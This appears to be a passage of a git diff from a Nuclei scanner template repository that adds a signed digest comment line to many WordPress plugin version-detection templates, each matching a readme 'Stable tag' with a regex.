http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + http/vulnerabilities/other/fastadmin-lfi.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..b65a5a4df0 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c389e8ec1910324962cfc9a6be17eff212e65f98b353c885bd319b8d49569aa502206dad80ed8cc27bcb21f9a10f0c5dd4cd83b454797a0a196008337d990d778be4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..b75323d5f2 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bd7fa56c9ded1d42d5751d2271a1c1055204c7c1c28a49574f6bc91e9f4e45b902203e9a15ac96f1b45b960658046c193fe3e61f8b3558729a759f1f37b1b5cdec95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..dcf0dd339b 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f73b2b685811a2aa5d466d16d0847b437020685207b55981258e3b592e7035002204b98947935a42308ceb782e479969f8b2641fd6ee885641ef98c26265f48003f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..2d47547e8a 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022056169e700d61aa5bf0414ee68e146a7f306b78ae85938a9f824a3a43d7067c31022100a722579d13527bcd738e9ee82906d81eac5b274671d6dd81f1af2624ff21ba9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f68ad2a6bf..ef1ee732b8 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022022ac58e34622aa637f2fdb3c28f7ae451fa2e0374b664cd0f03ee0915991aa9802210085bddd05800d2d9a4ec45ae14f809ff8c7b24c1bed195599c6e1d3f470ab54f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 196cc7e8e8..1f8285812c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022009de8f0f5ebcce302b212999a7826964342f8b526237adcb515454fdbf18d058022100aed5eafb075557fa537f5e8cb3b97b69041a8f37dba5f8cd87b38455eca86a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 55362630df..6e0176234b 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220607acc63f942de98489aa8c557ff634a7350a6573227e465ff2b32badbef25e00220798febe8ccd3d9f9248386fa96f705e4d5e9e1a51ff33b907c956fb5118f75df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..3e17c759e2 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009fc3170beb6398eab02896f3421a0b9ba060b0f00de0d812b94d37d55a7ddf5f022100f9fca9a66423562ea636a9faf831b1f7c67f4ece69d3487792a1f913813c726f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..d0276a7360 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207a1019a55580977361da21455545d1043e009e380971f0d7a1dd25fc53a4aa3f022100ca29c0763a86fe4bfce11c226898a0b10123b69d1bb66c329ab89e3bd634f586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..4f95e53a9f 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022022012ddcc9a54229dc21596229f0be2f68d58c1c5e4eb70e3f27c8af6fa9d1f602210081d705ad1f4de66126ee63a50526b4cf5a9bcd61f7828e0e6f43c919286d3af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..35eb81270e 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee275ffe9efe7143e218d3eade9d26bed7108013356e47110db32a89df8ef4c302205ce741db785bcc748a27ad34eed5eb308abd31e630276d1062a007e5242a689e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..29403f28f0 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec53867aafda46f0a2446d9c374f9f72c709eae36fa0cbc77a21b0b5e88cfb0d02207bd5ae8d7984c42f73debd73e83b9be2461d73fc0643f6f07100c21baa0e5ac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index f76b750bf6..d069ce2da5 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204bd58654bac2d642ea296d9ce06ba4db88bca685238a9201e47e6f3b55f181f3022100cac4981337c78b57b47167f941f1f6d8c7f8fcc869b6fd68a964c17fe86fb17f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..40fd76ad5e 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220020e0706837ea63424564e30abce9d9ad03d4fa5c3d6a616556407dcb9c51ce30220552fb729733f3c17617c1ab15a5f666a6380d74a46fae182042dce6eb6e4bca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index d1e01c329b..bb9f98847f 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a26f632bab2fb351a38cef8e9b50df6ef4a648bc93ed5eaa550bed5651995d23022064d679b6d213f33488e5f97cd965fab6b16c5d93cd9e24d1a37a3289fcac1b10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..a37cd4f343 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ece728fa0dea44700e5cb8a0a02683523092aec6e5cda42e8be5f91864aa629a022100b22a17b2f9799ba16e7efa90ed190493ffd5365fb90a29617d755c136c0e0c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..8246f82b32 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022032ea2c1890ccb5cf5012ba229670d28c90d637f904ae4024899b50b2a5cf2a8902201963d712871a685e9383eead84ff244dada4661146bdcb01a6a466e7b8cedad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..66c03a54e8 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100efb7998a849b09e7a06886685ba4bd81c1e2db0a6c12a28d9196f616f997d0170220295ac4be89935175917218eae8ea73b8f77d5af04a4c0b9b0c96686e90266d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f3aae5f624..7ba0f28f25 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022054515657ff4a7d1b0a466bbfa96e023add7a6fee01d5acbf20924d90d64d2329022100c2a043583a08d5a905da343bbf0cc130a1e0acb7763bc0c314f12fe34afe7e02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..1683ea688d 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e7193b8d4bbd60d9b6f8a0a152c7c33fbdf4524456a13c6f76bb4c9c28d304e02205e19137f0ee967914ad361a814d31869af50df332e64dbf32243426ae54df553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..3e56eebb11 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e932fa64065dc4cdeebeb42058850cc5f4294a7f6c7053184bc87bf22e793104022061218a1b1acd18b8a486b774132772813cfbb9fe3f07560487c863ac142ad0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..f7d21ca615 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210080da665152dc9dad7521d666bdc980e45034ef86a8d62dfc66156831816bc947022100d1e663f48d2428e229d6739cd25c2b199a9f65940c62abd578ef9e473a5117a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..c9f18f71e4 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022043870f22709bd131c84a80b6f314d05f0379871911ee34a5ac7a13d8e51b4f8d02201790a0abcd60ce6f4f6c4f882ffb78de206e227ad833b454ab69b3ddadabb52e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..9489994c9c 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205ab59e65278cef816036d4b0cd35723e9d5741cb7ff56f3781f2651005e07fa2022100a27fb38218796cdf9f1949bfd83bc3322756aaf7d6175e030edfda9d08e84cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..5b17e2e624 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008760e41f71f5e55e3a724654377afb7c3758321bbaeffb92df515f92405cfb92022100c97f23dbfb08a60b4933b88292e0400d168eabcd5e9b9fbd16e96cb15fd3a68f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..38762df0da 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220051f0860e0bb441d1a933020af5035db92fbed5d642c53780792ccf0ab4aab8a022100ae300d570ff853858b9e9e71219f205ff5daf2d98b01653d79d9948912c20ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..a743c39b66 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab212ebed5ce5a9519685d54d1311ec749cb7556d2719e69ddfb0061de5a5f98022100bd4be336e6fb47d0e2867e328325715a190d1da4cdda1d12076a593a828b2fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..27f1cbca0a 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220594366d7f84d4fea2f68a96f5b54beb28e3dd70cf42191ce4631029027e69f860221009dff6a0029fba48f5a9518a7f2f9da0eb7a628a837743dca0b29585a0ecc43f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..84de1cb0e4 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,3 +47,4 @@ http: part: body regex: - 